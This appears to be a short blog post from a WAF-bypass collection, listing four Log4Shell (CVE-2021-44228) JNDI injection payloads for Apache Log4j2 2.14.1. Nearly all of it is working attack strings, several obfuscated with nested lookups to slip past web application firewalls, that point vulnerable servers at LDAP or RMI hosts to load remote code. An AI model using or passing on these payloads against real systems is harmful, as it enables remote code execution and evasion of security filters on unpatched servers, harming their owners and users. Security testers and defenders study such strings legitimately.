WAF bypass RCE by jeffyd364

Date: January 17, 2022Author: wafbypass

Apache Log4j2 2.14.1 RCE (CVE-2021-44228)

Bypass WAF

1. ${jndi:ldap://127.0.0.1:1389/ badClassName}

2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

4. ${jndi:rmi://adsasd.asdasd.asdasd}

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools